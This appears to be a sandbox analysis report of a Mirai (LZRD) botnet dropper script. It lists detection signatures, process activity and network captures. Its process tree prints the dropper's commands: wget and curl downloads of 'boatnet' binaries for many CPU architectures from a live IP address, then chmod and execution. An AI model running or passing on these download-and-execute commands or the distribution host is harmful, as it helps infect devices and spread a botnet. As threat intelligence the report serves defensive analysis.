mirai | a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34

Analysis

max time kernel
150s
max time network
141s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
19/01/2025, 18:01 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

a6ab6f96f6881539ccc0aefa53d99da6
SHA1

eeeb59012c94058a106073e1595f84df20445979
SHA256

a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34
SHA512

ef0e55585920063d79f5508c6546ebe72dae9c8a5d59faf2fa3d3f3200fa6e970c0ead949638fd853bd752536aea1784fe70397fde0e8bee12478e55b3e6c600

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
873	chmod
755	chmod
773	chmod
827	chmod
867	chmod
891	chmod
729	chmod
736	chmod
792	chmod
879	chmod
744	chmod
810	chmod
816	chmod
847	chmod
885	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/WTF	730	WTF
/tmp/WTF	737	WTF
/tmp/WTF	745	WTF
/tmp/WTF	757	WTF
/tmp/WTF	774	WTF
/tmp/WTF	793	WTF
/tmp/WTF	811	WTF
/tmp/WTF	817	WTF
/tmp/WTF	829	WTF
/tmp/WTF	848	WTF
/tmp/WTF	868	WTF
/tmp/WTF	874	WTF
/tmp/WTF	880	WTF
/tmp/WTF	886	WTF
/tmp/WTF	892	WTF

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTF
File opened for modification	/dev/misc/watchdog	WTF

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTF
File opened for modification	/bin/watchdog	WTF

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx
behavioral3/files/fstream-4.dat	upx

Reads runtime system information 63 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/775/cmdline	WTF
File opened for reading	/proc/801/cmdline	WTF
File opened for reading	/proc/806/cmdline	WTF
File opened for reading	/proc/810/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/405/cmdline	WTF
File opened for reading	/proc/777/cmdline	WTF
File opened for reading	/proc/843/cmdline	WTF
File opened for reading	/proc/883/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/708/cmdline	WTF
File opened for reading	/proc/856/cmdline	WTF
File opened for reading	/proc/876/cmdline	WTF
File opened for reading	/proc/698/cmdline	WTF
File opened for reading	/proc/832/cmdline	WTF
File opened for reading	/proc/697/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/851/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/667/cmdline	WTF
File opened for reading	/proc/691/cmdline	WTF
File opened for reading	/proc/726/cmdline	WTF
File opened for reading	/proc/800/cmdline	WTF
File opened for reading	/proc/831/cmdline	WTF
File opened for reading	/proc/837/cmdline	WTF
File opened for reading	/proc/813/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/740/cmdline	WTF
File opened for reading	/proc/814/cmdline	WTF
File opened for reading	/proc/748/cmdline	WTF
File opened for reading	/proc/823/cmdline	WTF
File opened for reading	/proc/857/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/692/cmdline	WTF
File opened for reading	/proc/760/cmdline	WTF
File opened for reading	/proc/678/cmdline	WTF
File opened for reading	/proc/696/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/870/cmdline	WTF
File opened for reading	/proc/891/cmdline	WTF
File opened for reading	/proc/654/cmdline	WTF
File opened for reading	/proc/833/cmdline	WTF
File opened for reading	/proc/889/cmdline	WTF
File opened for reading	/proc/758/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/742/cmdline	WTF
File opened for reading	/proc/789/cmdline	WTF
File opened for reading	/proc/795/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/659/cmdline	WTF
File opened for reading	/proc/668/cmdline	WTF
File opened for reading	/proc/701/cmdline	WTF
File opened for reading	/proc/702/cmdline	WTF
File opened for reading	/proc/797/cmdline	WTF
File opened for reading	/proc/804/cmdline	WTF
File opened for reading	/proc/819/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/877/cmdline	WTF

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
732	wget
734	curl
735	cat

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.i686	curl
File opened for modification	/tmp/boatnet.arc	wget
File opened for modification	/tmp/boatnet.x86_64	curl
File opened for modification	/tmp/boatnet.arm5	wget
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.mpsl	curl
File opened for modification	/tmp/boatnet.arm	curl
File opened for modification	/tmp/boatnet.ppc	curl
File opened for modification	/tmp/boatnet.ppc	wget
File opened for modification	/tmp/boatnet.m68k	wget
File opened for modification	/tmp/boatnet.m68k	curl
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.arm	wget
File opened for modification	/tmp/boatnet.spc	wget
File opened for modification	/tmp/boatnet.sh4	wget
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.arm6	curl
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.mpsl	wget
File opened for modification	/tmp/boatnet.arm5	curl
File opened for modification	/tmp/boatnet.arm6	wget
File opened for modification	/tmp/boatnet.arm7	curl
File opened for modification	/tmp/boatnet.spc	curl
File opened for modification	/tmp/boatnet.sh4	curl
File opened for modification	/tmp/boatnet.arm7	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:701
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:705
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:721
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:728
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:730
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:732
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:735
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:737
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:741
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat boatnet.arc
  2⤵
  PID:743
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.i468
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.i468
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/cat
  cat boatnet.i468
  2⤵
  PID:753
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:757
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.i686
  2⤵
  PID:758
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- /bin/cat
  cat boatnet.i686
  2⤵
  PID:772
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:773
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:774
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.x86_64
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:781
- /bin/cat
  cat boatnet.x86_64
  2⤵
  PID:790
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:792
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:793
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:795
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat boatnet.mpsl
  2⤵
  PID:809
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:811
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:813
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/cat
  cat boatnet.arm
  2⤵
  PID:815
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:817
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:819
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/cat
  cat boatnet.arm5
  2⤵
  PID:826
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:829
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:832
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/cat
  cat boatnet.arm6
  2⤵
  PID:846
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:847
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:848
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:851
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:858
- /bin/cat
  cat boatnet.arm7
  2⤵
  PID:866
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:868
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:870
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/cat
  cat boatnet.ppc
  2⤵
  PID:872
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:874
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.spc
  2⤵
  - Writes file to tmp directory
  PID:876
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:877
- /bin/cat
  cat boatnet.spc
  2⤵
  PID:878
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:880
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:882
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/cat
  cat boatnet.m68k
  2⤵
  PID:884
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:886
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:888
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/cat
  cat boatnet.sh4
  2⤵
  PID:890
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:892

Network

GET

http://154.213.186.64/hiddenbin/boatnet.x86

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.x86 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:01:54 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "7208-62c0963906840"
Accept-Ranges: bytes
Content-Length: 29192
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.x86

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.x86 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:01:55 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "7208-62c0963906840"
Accept-Ranges: bytes
Content-Length: 29192
GET

http://154.213.186.64/hiddenbin/boatnet.mips

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.mips HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:01:56 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "7838-62c0963906840"
Accept-Ranges: bytes
Content-Length: 30776
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.mips

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.mips HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:00 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "7838-62c0963906840"
Accept-Ranges: bytes
Content-Length: 30776
GET

http://154.213.186.64/hiddenbin/boatnet.arc

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:01 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "1e518-62c09639358d9"
Accept-Ranges: bytes
Content-Length: 124184
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.arc

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arc HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:05 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "1e518-62c09639358d9"
Accept-Ranges: bytes
Content-Length: 124184
GET

http://154.213.186.64/hiddenbin/boatnet.i468

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.i468 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 19 Jan 2025 18:02:07 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 220
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://154.213.186.64/hiddenbin/boatnet.i468

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.i468 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 19 Jan 2025 18:02:09 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 220
Content-Type: text/html; charset=iso-8859-1
GET

http://154.213.186.64/hiddenbin/boatnet.i686

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.i686 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 19 Jan 2025 18:02:10 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 220
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://154.213.186.64/hiddenbin/boatnet.i686

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.i686 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 19 Jan 2025 18:02:11 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 220
Content-Type: text/html; charset=iso-8859-1
GET

http://154.213.186.64/hiddenbin/boatnet.x86_64

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.x86_64 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 19 Jan 2025 18:02:12 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 222
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://154.213.186.64/hiddenbin/boatnet.x86_64

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.x86_64 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 19 Jan 2025 18:02:13 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 222
Content-Type: text/html; charset=iso-8859-1
GET

http://154.213.186.64/hiddenbin/boatnet.mpsl

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.mpsl HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:14 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "7d7c-62c0963906840"
Accept-Ranges: bytes
Content-Length: 32124
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.mpsl

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.mpsl HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:16 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "7d7c-62c0963906840"
Accept-Ranges: bytes
Content-Length: 32124
GET

http://154.213.186.64/hiddenbin/boatnet.arm

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "71c8-62c0963906840"
Accept-Ranges: bytes
Content-Length: 29128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.arm

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:21 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "71c8-62c0963906840"
Accept-Ranges: bytes
Content-Length: 29128
GET

http://154.213.186.64/hiddenbin/boatnet.arm5

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm5 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:22 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "6398-62c0963906840"
Accept-Ranges: bytes
Content-Length: 25496
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.arm5

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm5 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:25 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "6398-62c0963906840"
Accept-Ranges: bytes
Content-Length: 25496
GET

http://154.213.186.64/hiddenbin/boatnet.arm6

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm6 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:27 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "8648-62c0963906840"
Accept-Ranges: bytes
Content-Length: 34376
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.arm6

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm6 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:29 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "8648-62c0963906840"
Accept-Ranges: bytes
Content-Length: 34376
GET

http://154.213.186.64/hiddenbin/boatnet.arm7

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm7 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 154.213.186.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:30 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "d240-62c0963906840"
Accept-Ranges: bytes
Content-Length: 53824
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET

http://154.213.186.64/hiddenbin/boatnet.arm7

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.arm7 HTTP/1.1
Host: 154.213.186.64
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 18:02:32 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 19 Jan 2025 06:38:17 GMT
ETag: "d240-62c0963906840"
Accept-Ranges: bytes
Content-Length: 53824
GET

http://154.213.186.64/hiddenbin/boatnet.ppc

Remote address:

154.213.186.64:80

Request

GET /hiddenbin/boatnet.ppc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
